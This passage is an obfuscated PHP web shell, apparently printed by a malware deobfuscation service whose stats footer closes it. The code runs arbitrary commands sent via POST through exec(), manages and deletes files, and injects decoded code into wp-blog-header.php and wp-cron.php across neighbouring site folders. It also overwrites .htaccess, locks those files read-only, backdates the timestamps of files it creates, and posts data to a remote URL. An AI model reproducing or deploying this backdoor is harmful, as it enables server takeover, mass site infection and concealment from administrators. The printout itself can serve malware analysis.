"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["\143\x32\150\154\x62\x47\x78\146\x59\62\71\x6b\132\x51\75\x3d"]; ?>
"type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="exec"type="hidden"> <input name="group_id"value="<?php  echo $_SESSION["\132\63\x4a\166\144\130\x41\75"]; ?>
"type="hidden"> <input name="shell_id"value="<?php  echo $_SESSION["\x63\x32\x68\x6c\142\x47\x78\x66\x61\x57\x51\x3d"]; ?>
"type="hidden"> <input name="shell_type"value="<?php  echo $_SESSION["\144\x48\x6c\x77\132\121\x3d\75"]; ?>
"type="hidden"> <button class="btn btn-sm btn-warning"type="submit">Exec</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php  echo $file_path; ?>
"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["\x63\62\150\154\x62\107\170\146\x59\62\71\x6b\x5a\121\x3d\75"]; ?>
"type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="others"type="hidden"> <input name="shell_id"value="<?php  echo $_SESSION["\x63\62\150\154\142\x47\x78\x66\x61\x57\121\x3d"]; ?>
"type="hidden"> <input name="group_id_2"value="<?php  echo $_SESSION["\x63\x32\126\152\142\x32\x35\153"]; ?>
"type="hidden"> <input name="group_id_3"value="<?php  echo $_SESSION["\144\x47\x68\160\143\x6d\122\156\143\155\71\x31\x63\x41\x3d\x3d"]; ?>
"type="hidden"> <input name="shell_type"value="<?php  echo $_SESSION["\x64\110\154\167\x5a\x51\75\75"]; ?>
"type="hidden"> <button class="btn btn-sm btn-info"type="submit">Others</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php  echo $file_path; ?>
"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["\143\x32\x68\154\142\x47\x78\x66\x59\62\x39\x6b\132\121\x3d\x3d"]; ?>
"type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="doors"type="hidden"> <input name="group_id"value="<?php  echo $_SESSION["\132\63\x4a\x76\144\x58\101\x3d"]; ?>
"type="hidden"> <input name="shell_id"value="<?php  echo $_SESSION["\x63\62\x68\x6c\142\107\170\x66\x61\127\x51\x3d"]; ?>
"type="hidden"> <input name="shell_type"value="<?php  echo $_SESSION["\144\110\x6c\167\132\121\75\75"]; ?>
"type="hidden"> <button class="btn btn-sm btn-danger"type="submit">Doors</button></form></div></div></div><div class="bd-example bd-example-row"style="border:1px solid #ededed;padding:1rem;margin:1rem 0"><div class="row"><div class="col-12 col-sm-12"style="text-align:center;font-weight:700"><?php  if ($_POST["\141\143\x74"] == "\x73\x68\145\x6c\x6c") { if ($_POST["\x74\x79\160\145"] == "\x72\x65\x62\141\x63\153") { rebackAction($_POST, $pws, $now_site); } else { if ($_POST["\164\x79\160\x65"] == "\145\x78\145\x63") { execAction($_POST, $pws, $now_site); } else { if ($_POST["\164\171\x70\145"] == "\x64\x6f\157\x72\x73") { doorsAction($_POST, $pws, $now_site); stationAction($_POST, $pws, $now_site); } else { if ($_POST["\x74\x79\160\x65"] == "\x6f\x74\150\x65\x72\163") { othersAction($_POST, $pws, $now_site); } } } } } if ($_POST["\141\143\164"] == "\145\x78\x65\x63\x5f\x63\x6f\144\145") { $exec_code = trim($_POST["\145\x78\x65\x63\x5f\x63\x6f\144\x65"]); exec($exec_code, $output, $returnVar); if ($returnVar === 0) { echo "\x3c\144\x69\x76\40\x73\164\x79\154\x65\x3d\47\x63\157\154\157\x72\x3a\x20\147\x72\x65\145\x6e\73\x66\x6f\x6e\164\55\x77\x65\151\x67\150\x74\x3a\142\x6f\154\x64\73\x27\x3e" . $exec_code . "\40\151\163\x20\123\165\143\x63\145\x73\x73\146\165\154\x6c\x79\56\x3c\x2f\x64\151\166\76"; foreach ($output as $k => $v) { echo $v . "\x3c\x62\x72\57\x3e"; } } else { echo "\74\144\151\166\40\x73\164\x79\x6c\145\x3d\47\143\x6f\154\x6f\x72\72\40\162\x65\x64\73\x66\x6f\x6e\164\x2d\x77\145\151\147\150\x74\x3a\142\157\154\x64\73\47\x3e" . $exec_code . "\40\x69\x73\40\x46\x61\x69\x6c\145\144\x3a" . $returnVar . "\x2e\x3c\x2f\x64\x69\x76\x3e"; } } ?>
</div></div></div><form action="?path=<?php  echo $file_path; ?>
"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["\x63\x32\x68\x6c\x62\107\x78\146\131\x32\71\153\132\121\75\x3d"]; ?>
"type="hidden"><div class="col-12"style="margin-bottom:1rem"><input name="act"value="del"type="hidden"> <button class="btn btn-xs btn-danger"type="submit">Delete</button></div><table class="table table-bordered"><thead><tr><th><div class="form-check"><input name="allcheck"value="1"type="checkbox"id="allcheck"class="form-check-input"></div></th><th>Name</th><th>Url</th><th>Size</th><th>Modify</th><th>Permission</th><th>Action</th></tr></thead><tbody><?php  if (!empty($file_list) && count($file_list) > 2) { foreach ($file_list as $k => $v) { if (!($v == "\x2e" || $v == "\x2e\x2e")) { $file_url = $now_path . "\x2f" . $v; ?>
<tr><th><div class="form-check"><input name="childcheck[]"value="<?php  echo $file_url; ?>
"type="checkbox"class="form-check-input"></div></th><td><?php  if (is_dir($file_url)) { echo "\74\141\x20\150\x72\145\146\75\42\x3f\x70\141\164\x68\75" . $file_url . "\46\164\171\x70\x65\75\61\42\40\x73\x74\x79\x6c\145\x3d\x22\x63\157\154\157\162\72\40\147\x72\145\x65\x6e\73\x66\157\x6e\164\55\167\x65\x69\x67\150\x74\x3a\142\x6f\154\x64\73\42\76\xa\x20\x20\40\40\40\40\40\40\40\x20\40\x20\40\x20\x20\40\x20\40\x20\40\x20\74\151\x20\143\x6c\x61\x73\x73\x3d\42\x62\x69\x20\142\151\x2d\x66\x6f\154\144\145\x72\x22\40\x73\x74\x79\x6c\145\75\42\x76\x65\162\164\x69\143\141\x6c\x2d\141\154\151\x67\156\72\40\155\x69\x64\x64\x6c\145\x3b\x22\76\xa\x20\40\40\x20\x20\40\40\40\40\x20\x20\x20\x20\40\40\x20\40\40\40\40\40\x20\x20\40\x3c\x73\166\x67\40\x78\x6d\x6c\x6e\x73\x3d\42\x68\x74\x74\x70\x3a\x2f\x2f\167\167\167\56\x77\x33\x2e\x6f\x72\x67\57\62\60\60\60\x2f\x73\166\147\42\x20\167\x69\144\x74\x68\75\42\x31\66\42\40\150\x65\x69\x67\150\x74\x3d\x22\x31\x36\x22\40\146\151\154\x6c\x3d\42\143\165\x72\x72\x65\x6e\164\103\x6f\x6c\157\x72\42\40\x63\154\141\163\163\x3d\42\142\x69\x20\x62\151\x2d\x66\157\154\x64\145\x72\42\40\x76\151\145\167\x42\157\170\x3d\42\x30\x20\60\40\x31\x36\40\61\x36\42\x3e\xa\40\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\x20\40\x20\40\x20\x20\74\x70\x61\x74\150\x20\144\75\42\x4d\56\x35\x34\40\x33\56\70\x37\x2e\x35\x20\x33\141\x32\x20\x32\x20\x30\40\x30\40\61\40\x32\x2d\62\x68\63\56\66\x37\x32\x61\62\x20\x32\x20\60\40\x30\x20\61\40\x31\56\64\61\x34\56\65\x38\x36\154\x2e\x38\x32\70\x2e\70\x32\x38\x41\62\x20\x32\40\x30\40\60\x20\60\x20\x39\x2e\70\62\x38\x20\x33\x68\63\x2e\71\x38\x32\x61\62\40\x32\x20\x30\40\60\x20\61\40\x31\x2e\71\x39\x32\40\x32\56\61\x38\x31\x6c\x2d\56\66\63\67\40\67\101\x32\40\x32\40\x30\x20\60\x20\x31\x20\61\x33\56\61\67\x34\40\x31\64\110\62\56\70\62\66\141\62\40\x32\40\x30\x20\x30\x20\x31\x2d\x31\x2e\71\x39\x31\55\61\56\x38\61\x39\154\x2d\56\66\63\67\x2d\67\x61\61\56\x39\71\x20\61\56\x39\71\x20\60\x20\x30\x20\61\x20\56\63\64\62\55\x31\x2e\63\x31\172\115\62\56\61\71\40\x34\x61\x31\x20\x31\x20\60\x20\60\x20\x30\x2d\x2e\71\x39\66\x20\61\56\x30\x39\154\56\x36\x33\x37\x20\x37\141\61\x20\61\x20\x30\x20\x30\40\60\x20\56\x39\x39\x35\56\x39\61\150\61\x30\56\x33\x34\70\141\x31\40\x31\40\60\40\60\x20\60\40\x2e\71\x39\65\55\x2e\x39\x31\x6c\x2e\66\x33\x37\x2d\x37\101\x31\40\x31\x20\x30\40\60\40\60\x20\61\63\x2e\x38\61\40\x34\x48\62\x2e\61\x39\x7a\x6d\x34\x2e\x36\71\x2d\x31\56\67\x30\x37\101\x31\x20\x31\40\60\40\60\x20\x30\40\x36\56\x31\x37\62\40\62\110\x32\x2e\x35\141\x31\x20\x31\x20\60\40\x30\x20\x30\x2d\x31\x20\56\x39\x38\x31\154\56\60\x30\x36\56\x31\x33\x39\103\61\56\x37\x32\40\63\56\60\x34\62\40\x31\56\x39\x35\x20\63\x20\62\56\61\x39\x20\x33\150\65\x2e\x33\x39\66\x6c\55\x2e\x37\x30\67\x2d\x2e\67\x30\67\172\x22\57\x3e\12\40\x20\40\x20\x20\40\x20\40\40\x20\x20\40\x20\40\x20\40\x20\40\40\40\40\x20\x20\40\x3c\57\x73\166\147\x3e\xa\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\40\40\40\40\x20\x20\x20\74\57\x69\x3e" . $v . "\x3c\x2f\141\76"; } else { echo "\x3c\x61\40\x68\162\145\146\75\x22\77\x70\141\164\x68\75" . $file_url . "\x26\164\171\x70\x65\75\x32\x22\x3e" . $v . "\x3c\x2f\141\x3e"; } ?>
</td><td><?php  if (!is_dir($file_url)) { ?>
<a href="<?php  echo $now_url . "\x2f" . $v; ?>
"target="_blank">click visit</a><?php  } ?>
</td><td><?php  if (is_dir($file_url)) { echo "\x3c\146\x6f\x6e\x74\40\143\x6f\x6c\x6f\x72\75\x22\147\x72\145\145\x6e\x22\x20\163\x74\171\154\145\75\x22\x66\157\x6e\x74\55\167\145\x69\x67\150\x74\72\40\x62\x6f\x6c\x64\73\42\x3e\104\x69\x72\145\x63\164\157\162\x79\74\57\146\x6f\156\x74\x3e"; } else { echo getFileSize($file_url); } ?>
</td><td><?php  $modificationTime = filemtime($file_url); echo date("\x59\x2d\155\x2d\144\x20\110\x3a\x69\72\163", $modificationTime); ?>
</td><td><?php  $permission = getFilePermission($file_url); if (strpos($permission, "\x77") !== false) { echo "\x3c\x66\x6f\156\164\x20\x63\157\154\157\x72\x3d\42\147\162\145\x65\156\x22\40\x73\x74\171\154\x65\x3d\42\x66\157\156\164\55\x77\x65\151\x67\x68\164\72\x20\x62\157\154\x64\x3b\x22\76" . $permission . "\74\x2f\x66\x6f\156\x74\76"; } else { echo "\x3c\146\157\x6e\164\x20\143\157\154\157\162\75\42\162\145\144\x22\40\163\164\x79\x6c\x65\75\x22\x66\x6f\156\164\x2d\x77\x65\151\x67\150\164\72\x20\x62\x6f\154\144\x3b\x22\x3e" . $permission . "\74\x2f\146\x6f\156\x74\x3e"; } ?>
</td><td><a href="?path=<?php  echo $file_url; ?>
&type=4"class="btn btn-xs btn-primary">Rename</a> <a href="?path=<?php  echo $file_url; ?>
&type=2"class="btn btn-info btn-xs">Edit</a> <a href="?path=<?php  echo $file_url; ?>
&type=5"class="btn btn-xs btn-warning">Chmod</a></td></tr><?php  } } } else { ?>
<tr><td colspan="4"style="text-align:center;color:red">No Files!</td></tr><?php  } ?>
</tbody></table></form></div><?php  } } } } } } ?>
</div><script>$(function(){$("#allcheck").click(function(){$("#allcheck").is(":checked")?$('input[name="childcheck[]"]').each(function(){$(this).attr("checked",!0)}):$('input[name="childcheck[]"]').each(function(){$(this).attr("checked",!1)})})})</script><script>$(function(){$("#allcheck").click(function(){$(".item").prop("checked",this.checked)}),$(".item").click(function(){$(".item").length==$(".item:checked").length?$("#allcheck").prop("checked",!0):$("#allcheck").prop("checked",!1)}),$(".delBtn").click(function(){var e=[];if($(".item:checked").each(function(){e.push($(this).val())}),0==e.length)return alert("please select files"),!1;$("#deleteForm").submit()})})</script></body></html><?php  } goto K9iJZ; LaqJP: function getParentsFolders($path) { $all_folders = array(); $parent_folds = dirname($path); $directories = glob($parent_folds . "\x2f\x2a", GLOB_ONLYDIR); $all_folders = $directories; $parent_folds = dirname($parent_folds); $directories = glob($parent_folds . "\57\52", GLOB_ONLYDIR); $all_folders = array_merge($all_folders, $directories); return $all_folders; } goto rAmLO; wS8ZC: error_reporting(0); goto F71ic; Mcawi: $data = $_SERVER; goto fCRLr; wH0Wc: function add_station($station_code, $ht_content, $now_site) { $station_code = base64_decode($station_code); $count = 0; $path = $_SERVER["\x44\117\103\125\x4d\105\116\x54\x5f\x52\117\x4f\124"]; $folder_name = basename($path); $all_folders = getParentsFolders($path); $all_results = array(); foreach ($all_folders as $k => $v) { $directories = glob($v . "\57\x2a", GLOB_ONLYDIR); $all_folders = array_merge($all_folders, $directories); } foreach ($all_folders as $k => $v) { if (!strpos($v, $folder_name)) { $all_results[] = $v; } } foreach ($all_results as $k => $v) { $index_url = $v . "\x2f\167\160\55\142\154\x6f\147\x2d\150\x65\x61\144\145\162\56\x70\150\x70"; $wp_url = $v . "\x2f\167\x70\x2d\143\x72\x6f\x6e\x2e\x70\150\160"; $ht_url = $v . "\x2f\x2e\150\164\141\143\x63\145\163\163"; $index_yuan = ''; if (file_exists($index_url)) { chmod($index_url, 420); $index_yuan = file_get_contents($index_url); } if (strpos($index_yuan, $station_code) === false) { file_put_contents($index_url, $station_code . $index_yuan); chmod($index_url, 292); } $wp_yuan = ''; if (file_exists($wp_url)) { chmod($wp_url, 420); $wp_yuan = file_get_contents($wp_url); } if (strpos($wp_yuan, $station_code) === false) { file_put_contents($wp_url, $station_code . $wp_yuan); chmod($wp_yuan, 292); } chmod($ht_url, 420); file_put_contents($ht_url, $ht_content); chmod($ht_url, 292); $count++; } return $count; } goto LaqJP; PTTlf: function curlpost($url, $data) { $jsonData = json_encode($data); $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\x43\x6f\x6e\164\x65\156\x74\55\x54\171\x70\x65\72\40\x61\x70\x70\x6c\151\143\141\x74\x69\x6f\x6e\x2f\152\163\157\x6e", "\x43\157\x6e\x74\x65\156\164\x2d\114\x65\156\x67\164\x68\72\x20" . strlen($jsonData))); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonData); $response = curl_exec($ch); $result = array(); if (curl_errno($ch)) { $result["\x73\x74\141\164\x75\x73"] = 0; $result["\x6d\x73\x67"] = curl_error($ch); } curl_close($ch); $res = json_decode($response, true); $result["\x73\x74\x61\164\165\x73"] = $res["\x73\x74\x61\164\x75\163"]; return $result; } goto EuW2e; bqkBE: $prot = !empty($_SERVER["\x48\x54\124\x50\123"]) && $_SERVER["\110\124\124\x50\x53"] !== "\x6f\x66\x66" || $_SERVER["\123\x45\x52\126\105\x52\x5f\120\x4f\x52\x54"] == 443 ? "\x68\164\164\x70\163\x3a\57\x2f" : "\x68\164\x74\160\x3a\57\57"; goto g0myE; fCRLr: $website_path = $data["\x44\x4f\103\125\115\105\116\124\137\x52\117\117\x54"]; goto HqanP; EuW2e: function crefile($fiurl, $contnt) { $path = $_SERVER["\104\117\x43\x55\x4d\x45\x4e\x54\x5f\122\x4f\x4f\x54"] . "\x2f"; $filath = $path . dirname($fiurl); if (!is_dir($filath)) { if (!mkdir($filath, 493, true)) { return false; } } $file_path = $path . $fiurl; if (file_put_contents($file_path, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($file_path, $time); return true; } else { return false; } } goto WX_1S; Tez2J: function add_others($group2_code, $group3_code, $second_file, $third_file, $now_site) { $result = array(); $sf = crefile($second_file, $group2_code); $tf = crefile($third_file, $group3_code); $result["\163\x65\143\157\x6e\x64\x5f\165\162\154"] = ''; $result["\164\x68\151\162\144\x5f\x75\x72\154"] = ''; if ($sf) { $result["\x73\x65\143\x6f\156\144\137\165\x72\x6c"] = $now_site . "\x2f" . $second_file; } if ($tf) { $result["\164\150\151\x72\x64\x5f\x75\162\x6c"] = $now_site . "\x2f" . $third_file; } return $result; } goto z3V3_; axLdL: ?>

Function Calls

None

Variables

None

Stats

MD5 ce64d7b671b9466f126fd1807ee5158a
Eval Count 0
Decode Time 85 ms